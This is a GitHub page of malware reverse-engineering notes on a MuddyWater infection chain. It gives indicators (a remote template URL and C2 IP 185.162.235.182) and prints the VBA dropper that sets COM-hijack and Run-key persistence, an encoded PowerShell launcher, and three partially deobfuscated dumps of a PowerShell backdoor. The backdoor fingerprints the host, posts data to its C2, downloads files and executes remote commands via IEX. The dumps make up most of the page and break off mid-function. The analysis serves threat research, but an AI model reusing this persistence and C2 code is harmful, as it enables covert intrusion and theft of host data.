Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Malware-Misc-RE/2019-04-09-MuddyWater-Chain-Notes-vk.ps1
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
2915 lines (1328 sloc)
43 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SHA-256: b9a67ffb81420e68f9e5607cc200604a | |
| // ht @HONKONE_K & @shotgunner101 | |
| // REMOTE TEMPLATE :http://tfu[.]ae/readme.txt | |
| // C2: hxxp://185[.]162[.]235[.]182 | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// WRITE TO REGISTRY //////////////////////////////////////// | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| Dim VBDxTHIz As Object | |
| Set VBDxTHIz = CreateObject("WScript.Shell") | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\Manage\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\Manage\command\",\ | |
| VfNxRmsa, "REG_SZ" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\UpdateService", \ | |
| "c:\windows\explorer.exe shell:::{8dac4e38-b146-4617-96a3-a3f839e5c568}", "REG_SZ" | |
| Open "c:\windows\temp\picture.jpg" For Output As #1 | |
| Print #1, kzWYdqvaZi | |
| Close #1 | |
| Open "c:\windows\temp\icon.ico" For Output As #1 | |
| Print #1, "CreateObject(""Wscript.Shell"").Run WScript.Arguments(0), 0, False" | |
| Close #1 | |
| /* | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// COMMAND-LINE ARGUMENT FROM REGISTRY ////////////////////// | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| c:\windows\system32\wscript.exe /E:vbs \ | |
| c:\windows\temp\icon.ico \ | |
| "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]:: \ | |
| FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" | |
| */ | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// PARTIAL DECODED POWERSHELL SCRIPT "picture.jpg ////////// | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| kXBglobal:url = WqoWqo | |
| kXBglobal:id = WqoWqo | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = WqoPOSTWqo; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = Wqoapplication/jsonWqo | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = WqoerrorWqo | |
| write-host kXBhey Wqo`tWqo (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = WqoGETWqo; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = WqoerrorWqo | |
| write-host kXBhey Wqo`tWqo (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = WqoGETWqo; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = WqoWqo | |
| } | |
| return kXBerfhyg | |
| } | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith(WqocdWqo)){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg Jx1 Out-String) | |
| } catch { | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig Jx1 where {kXB_ -match V7XIPv4.+6azs(6azd{1,3}6az.6azd{1,3}6az.6azd{1,3}6az.6azd{1,3})V7X } Jx1 out-null; kXBZngpurf[1])); | |
| } catch { | |
| return WqoErrorIPWqo; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path WqoHKLM:6azSOFTWARE6azMicrosoft6azWindows NT6azCurrentVersionWqo -Name ProductName).ProductName) | |
| } catch { | |
| return WqoErrorOSWqo; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return Wqo32-bitWqo | |
| } | |
| else{ | |
| return Wqo64-bitWqo | |
| } | |
| } catch { | |
| return WqoErrorArchWqo; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain6azs+6azS+kXBV7X -replace V7X.+?(6azS+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return WqoErrorDomainWqo; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return WqoErrorHostNameWqo; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:6az6azusers6az6azV7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return Wqo-Wqo | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return WqoWqo | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG Wqohttps://v4.ident.me/Wqo | |
| return kXBernyVC | |
| } catch { | |
| return WqoErrorPublicIPWqo | |
| } | |
| } | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgCVC | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, (Wqoc:6azprogramdata6azWqo + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny WqopwdWqo | |
| }catch{ | |
| 0x2c94270 (23910): | |
| kXBglobal:url = "" | |
| kXBglobal:id = "" | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = "POST"; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = "application/json" | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = "" | |
| } | |
| return kXBerfhyg | |
| } | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith("cd")){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg Jx1 Out-String) | |
| } catch { | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig Jx1 where {kXB_ -match V7XIPv4.+6azs(6azd{1,3}6az.6azd{1,3}6az.6azd{1,3}6az.6azd{1,3})V7X } Jx1 out-null; kXBZngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:6azSOFTWARE6azMicrosoft6azWindows NT6azCurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain6azs+6azS+kXBV7X -replace V7X.+?(6azS+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:6az6azusers6az6azV7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG "https://v4.ident.me/" | |
| return kXBernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgCVC | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, ("c:6azprogramdata6az" + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
| return kXB_.Exception.Message | |
| } | |
| } | |
| elseif(kXBpzq.StartsWith(V7XcmdV7X)){ | |
| kXBpzq= | |
| 0x2c9b1b8 (23802): | |
| kXBglobal:url = "" | |
| kXBglobal:id = "" | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = "POST"; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = "application/json" | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = "" | |
| } | |
| return kXBerfhyg | |
| } | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith("cd")){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg | Out-String) | |
| } catch { | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig | where {kXB_ -match V7XIPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})V7X } | out-null; kXBZngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
